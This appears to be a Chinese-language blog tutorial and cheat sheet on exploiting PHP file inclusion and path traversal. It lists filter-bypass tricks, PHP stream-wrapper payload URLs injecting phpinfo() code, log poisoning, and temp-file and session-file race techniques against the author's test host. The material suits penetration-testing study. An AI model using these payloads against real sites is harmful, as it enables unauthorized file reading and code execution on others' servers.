一,PHP中关于文件的操作
任意文件读取/下载,任意文件删除,任意文件包含file_get_contents(),unlink(),include()
支持【./】和【../】,【../】可用来穿越目录
http://luoke.cn:81/test/1.php?path2=../1.txt
对于将【../】替换为空的,可以双写绕过【..././】
对于强制要求以【upload/】开头的,可以【upload/../../】绕过
对于强制要求以【.xlsx】结尾的,可以【1.php%00.xlsx】绕过
对于Windows服务器支持【..\】,支持NTFS文件流【txt::$DATA】
http://luoke.cn:81/test/1.php?path2=..\1.txt支持短文件名,注意,apache默认url也支持短文件名,
http://luoke.cn:81/test/1.php?path2=123456~1.txthttp://luoke.cn:81/test/123456~1.txtIIS虽然不支持,但是可以用用404和400猜解出来
https://github.com/lijiejie/IIS_shortname_Scanner
file_get_contents()和include()对于Windows服务器支持后面有一些多余的字符,比如空格和点,bp fuzz如下
%20,%22,%2e,%3c,%3e,%81-%fe
http://luoke.cn:81/test/1.php?path2=1.txt%fe还可以用当做通配符代替后缀
http://luoke.cn:81/test/1.php?path2=1.http://luoke.cn:81/test/1.php?path2=1.<http://luoke.cn:81/test/1.php?path2=1.>>>二,PHP中支持多种协议
file
http://luoke.cn:81/test/1.php?path2=file:///C:/xampp/htdocs/1.txthttp(s)和ftp
file_get_contents需要allow_url_fopen=On
include需要allow_url_fopen=On allow_url_include=On
http://luoke.cn:81/test/1.php?path2=http://www.baidu.comhttp://luoke.cn:81/test/1.php?path2=ftp://luoke.cn/Downloads/test/1.batphp://filter
需要allow_url_fopen=On,用include也只能读取文件内容而不能执行代码
http://luoke.cn:81/test/1.php?path2=php://filter/resource=1.txthttp://luoke.cn:81/test/1.php?path2=php://filter/convert.base64-encode/resource=1.txthttp://luoke.cn:81/test/1.php?path2=php://filter/read=string.toupper|string.rot13/resource=1.txt也可以和其他协议一起来用
http://luoke.cn:81/test/1.php?path2=php://filter/convert.base64-encode/resource=https://www.baidu.comphp://input
需要allow_url_include=on
POST /test/1.php?path1=php://input<?php phpinfo();?>更多php://协议见
https://www.php.net/manual/zh/wrappers.php.php
zip,compress.zlib, compress.bzip2,phar
http://luoke.cn:81/test/1.php?path1=zip://C:\xampp\htdocs\test\1.zip%23test.phphttp://luoke.cn:81/test/1.php?path1=compress.bzip2://C:\xampp\htdocs\test\1.bz2http://luoke.cn:81/test/1.php?path1=compress.zlib://C:\xampp\htdocs\test\1.gz上面三个必须使用绝对路径,bz2和gz压缩包需要在linux环境生成
tar -czf 1.gz phpinfo.phptar -cjf 1.bz2 phpinfo.phphttp://luoke.cn:81/test/1.php?path1=phar://1.zip/test.phpdata:text/plain
需要allow_url_fopen=On allow_url_include=On
http://luoke.cn:81/test/1.php?path1=data:text/plain,<?php %20phpinfo();?>http://luoke.cn:81/test/1.php?path1=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2bsmb
仅windows服务器支持,双off都可以包含,但国内公网已屏蔽smb协议
http://luoke.cn:81/test/1.php?path1=\\127.0.0.1\Users\Administrator.log
三,无法上传文件如何包含
可以包含缓存或者日志文件
http://luoke.cn:81/test/1.php?<?php phpinfo();?>用burp直接发包,浏览器会url编码,这样即使报错400也会被写入log
http://luoke.cn:81/test/1.php?path1=../../apache/logs/access.log
包含php的上传缓存,目录于phpinfo中upload_tmp_dir
其原理是对任意php构造上传表单(即使无法上传文件),都会在此目录生成一个php****.tmp的缓存文件
可以包含此文件,但文件存活时间很短且随机名称,所以可以在phpinfo页面上传文件, phpinfo中含有此缓存文件的名称。
同时会将一些head头和GET打印出来,会延迟tmp文件删除的时间,需要在head和GET头填入垃圾字符。脚本如下
https://github.com/luoke90hou/files/blob/main/include_tmp.py
无phpinfo,有PHPSESSID还可以包含tmp目录里的session文件
session_start()开启session。
随便构造一个对任意php文件上传内容为<?php phpinfo();?>的文件
<form action="http://luoke.cn:81/echo.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="" /> <input type="file" name="file" /><input type="submit" />form>然后burp条件竞争
http://luoke.cn:81/test/1.php?path1=file:///C:\xampp\tmp\sess_2sm7vtt2i612p3ith57rhi5gqc成功包含
CVE-2018-12613 phpmyadmin也是包含的session文件
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
